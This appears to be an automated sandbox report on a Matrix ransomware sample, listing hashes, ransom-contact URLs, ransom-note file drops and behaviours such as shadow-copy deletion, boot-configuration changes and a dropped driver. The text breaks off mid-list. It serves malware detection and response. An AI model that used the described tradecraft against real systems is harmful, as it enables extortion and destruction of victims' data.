Analysis
-
max time kernel
299s -
max time network
270s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
01-09-2023 05:14
Static task
static1
Behavioral task
behavioral1
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win10v2004-20230831-en
General
-
Target
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
-
Size
3.8MB
-
MD5
ac42a9b2338847bb398152b1bf6401fd
-
SHA1
02daf9ff6773da4d134c94fdb7630af2cc01e399
-
SHA256
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
-
SHA512
016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
SSDEEP
49152:PXlOslYQt+5oXlabPyyNHb/GMO6d+5M+HKo:PEUYQtXQFC6s5M+HH
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\#ANN_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\PlayReadyCdm\_platform_specific\win_x64\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\Videos\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sl\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft OneDrive\setup\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr_CA\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft\SmsRouter\MessageStore\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pl\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\Office\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sk\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\am\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sr\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hdxf54l3.default-release\settings\main\ms-language-packs\browser\newtab\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\Searches\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3744 bcdedit.exe 4868 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 153 4240 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS LqC3I9JZ64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" LqC3I9JZ64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4272677097-406801653-1594978504-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 4260 NWDyMrAh.exe 692 LqC3I9JZ.exe 5904 LqC3I9JZ64.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1424 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/692-2431-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x000900000002326e-2224.dat upx behavioral2/files/0x000900000002326e-2717.dat upx behavioral2/memory/692-10133-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Public\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: LqC3I9JZ64.exe File opened (read-only) \??\L: LqC3I9JZ64.exe File opened (read-only) \??\M: LqC3I9JZ64.exe File opened (read-only) \??\Y: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\K: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\H: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\H: LqC3I9JZ64.exe File opened (read-only) \??\U: LqC3I9JZ64.exe File opened (read-only) \??\W: LqC3I9JZ64.exe File opened (read-only) \??\Z: LqC3I9JZ64.exe File opened (read-only) \??\W: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\N: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\G: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\K: LqC3I9JZ64.exe File opened (read-only) \??\V: LqC3I9JZ64.exe File opened (read-only) \??\X: LqC3I9JZ64.exe File opened (read-only) \??\S: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\I: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\A: LqC3I9JZ64.exe File opened (read-only) \??\B: LqC3I9JZ64.exe File opened (read-only) \??\T: LqC3I9JZ64.exe File opened (read-only) \??\X: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\T: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\Q: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: LqC3I9JZ64.exe File opened (read-only) \??\Q: LqC3I9JZ64.exe File opened (read-only) \??\Z: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\V: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\M: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\S: LqC3I9JZ64.exe File opened (read-only) \??\R: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\P: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: LqC3I9JZ64.exe File opened (read-only) \??\G: LqC3I9JZ64.exe File opened (read-only) \??\R: LqC3I9JZ64.exe File opened (read-only) \??\N: LqC3I9JZ64.exe File opened (read-only) \??\Y: LqC3I9JZ64.exe File opened (read-only) \??\P: LqC3I9JZ64.exe File opened (read-only) \??\U: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\L: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\J: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\J: LqC3I9JZ64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 152 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4272677097-406801653-1594978504-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\8XFNKXtw.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libstereo_widen_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\vi.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\[email protected] 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hu.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sv.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\vk_swiftshader_icd.json 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libanaglyph_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\eventlog_provider.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Notifications\SoftLandingAssetLight.gif.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\LICENSE 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\el.pak 